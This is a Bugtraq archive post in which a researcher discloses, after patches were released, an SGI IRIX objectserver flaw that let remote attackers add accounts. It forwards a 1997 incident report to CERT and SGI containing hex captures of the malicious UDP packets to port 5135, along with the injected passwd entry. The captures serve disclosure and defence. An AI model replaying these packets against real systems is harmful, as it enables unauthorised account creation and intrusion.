Bugtraq mailing list archives
Objectserver vulnerability
From: hmkash () ARL MIL (Howard M. Kash III)
Date: Wed, 29 Mar 2000 08:52:06 EST
Since the patches are now officially released, I feel I can finally release the details of the SGI objectserver vulnerability. This vulnerability was initailly reported to CERT and SGI Security on October 6, 1997. A beta version of patch 2849 was provided in February 1998. Howard ----- Forwarded message # 1: Date: Mon, 6 Oct 97 7:09:51 EDT From: "Howard M. Kash III" To: cert () cert org, security-alert () sgi com Subject: URGENT - new SGI vulnerability -----BEGIN PGP SIGNED MESSAGE----- URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT SGI objectserver vulnerabilty allows remote users to create accounts. Yesterday two of our hosts were compromised by an (as far as I could determine) unknown, unpatched bug in SGI's objectserver. The attack consisted of sending UDP packets to port 5135 (see below). The result was a non-root account being added to the system. The two compromised hosts were running IRIX 6.2, but the vulnerability may affect other versions of IRIX. The vulnerability does not appear to give root access directly, as the attackers used other IRIX vulnerabilities to gain root access after logging into the new account. Attached are the UDP packets exchanged between the attacking host (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP addresses have been masked to protect the guilty - I mean innocent until proven guilty. The result of this sequence of packets is the following line added to /etc/passwd: gueust:x:5002:20:LsD:/tmp/.new:/bin/csh An entry must also be added to /etc/shadow since the attacker then logs into the new account with a password. As a temporary measure we have blocked all traffic to port 5135 at our gateway. Howard Kash U.S. Army Research Lab - ------------------------------------------------------------------------ TCP and UDP headers have been separated out. I've decoded some of the packet contents into its ascii equivalent below the line. 16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52 4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa tttt tttt 112a 140f 003c 6516 0001 0000 0001 0000 0000 0024 0000 0000 2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001 0107 0101 16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95 4500 007b 0644 0000 3a11 26dc tttt tttt aaaa aaaa 140f 112a 0067 0d37 0001 0186 0001 0000 0000 004f 0000 0000 2903 0043 000a 0080 4300 8043 0105 0a01 013b 0178 0469 0a79 9a01 330a 0101 3b01 7804 690a 799a 0138 0a01 013b 0178 0469 0a79 9a01 020a 0101 3b01 7804 690a 799a 0103 0a01 013b 0178 0469 0a79 9a01 04 16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312 4500 0154 7da3 0000 2a11 bea3 aaaa aaaa tttt tttt 112a 140f 0140 a1b2 0001 0000 0001 0000 0000 0128 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 g u e u s t 170b 0101 3b01 0201 0101 0943 0103 4c73 L s 4417 0b01 013b 016e 0106 0109 4300 170b D 0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717 0b01 013b / t m p / . n e w 016e 0112 0109 4301 0470 6f6f 7417 0b01 013b 016e 0102 0103 0017 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 / b i n / c s h 0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444 16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41 4500 0045 0646 0000 3a11 2710 tttt tttt aaaa aaaa 140f 112a 0031 0ef5 0001 0187 0001 0000 0000 0019 0000 0000 2503 0043 0201 1d0a 0080 4300 0a01 013b 0178 0469 0a79 9a01 39 16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52 4500 0050 8f33 0000 2a11 ae17 aaaa aaaa tttt tttt 112f 140f 003c 6511 0001 0000 0001 0000 0000 0024 0000 0000 2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001 0107 0101 16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108 4500 0088 0669 0000 3a11 26aa tttt tttt aaaa aaaa 140f 112f 0074 3f4f 0001 0188 0001 0000 0000 005c 0000 0000 2903 0043 000a 0080 4300 8043 0106 0a01 013b 0178 0469 0a79 9a01 330a 0101 3b01 7804 690a 799a 0138 0a01 013b 0178 0469 0a79 9a01 390a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0469 0a79 9a01 030a 0101 3b01 7804 690a 799a 0104 16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314 4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa tttt tttt 112f 140f 0142 1399 0001 0000 0001 0000 0000 012a 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 170b 0101 3b01 0201 0101 0943 0103 4c73 4417 0b01 013b 016e 0106 0109 4300 170b 0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717 0b01 013b 016e 0112 0109 4301 0475 7365 7217 0b01 013b 016e 0102 0103 0213 8a17 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444 16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41 4500 0045 0671 0000 3a11 26e5 tttt tttt aaaa aaaa 140f 112f 0031 0dee 0001 0189 0001 0000 0000 0019 0000 0000 2503 0043 0201 1d0a 0080 4300 0a01 013b 0178 0469 0a79 9a01 3a -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+ n9jE26XP5HU= =yKsl -----END PGP SIGNATURE----- ----- End of forwarded messages
Current thread:
- Re: Esafe Protect Gateway (CVP) does not scan virus under some, (continued)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Smith, Eric V. (Mar 24)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Alon Rotem (Mar 24)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Alon Rotem (Mar 24)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Hugo.van.der.Kooij () CAIW NL (Mar 24)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Eric Chien (Mar 24)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Jason Brvenik (Mar 24)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Lea, Michael (Mar 24)
- Security Problems with Linux 2.2.x IP Masquerading H D Moore (Mar 27)
- Follow-Up: Security Problems with Linux 2.2.x IP Masquerading H D Moore (Mar 28)
- privacy problems with HTTP cache-control Martin Pool (Mar 28)
- Objectserver vulnerability Howard M. Kash III (Mar 29)
- Citrix ICA Basic Encryption Dug Song (Mar 29)
- Re: Citrix ICA Basic Encryption Weld Pond (Mar 28)
- Re: Citrix ICA Basic Encryption Chris Knight (Mar 29)
- Security Problems with Linux 2.2.x IP Masquerading H D Moore (Mar 27)
- Re: Security Problems with Linux 2.2.x IP Masquerading Olaf Kirch (Mar 30)
- Remote DoS Attack in Windows 2000/NT 4.0 TCP/IP Print Request Server Vulnerability Ussr Labs (Mar 30)
- Re: Esafe Protect Gateway (CVP) does not scan virus under some Ian Turner (Mar 27)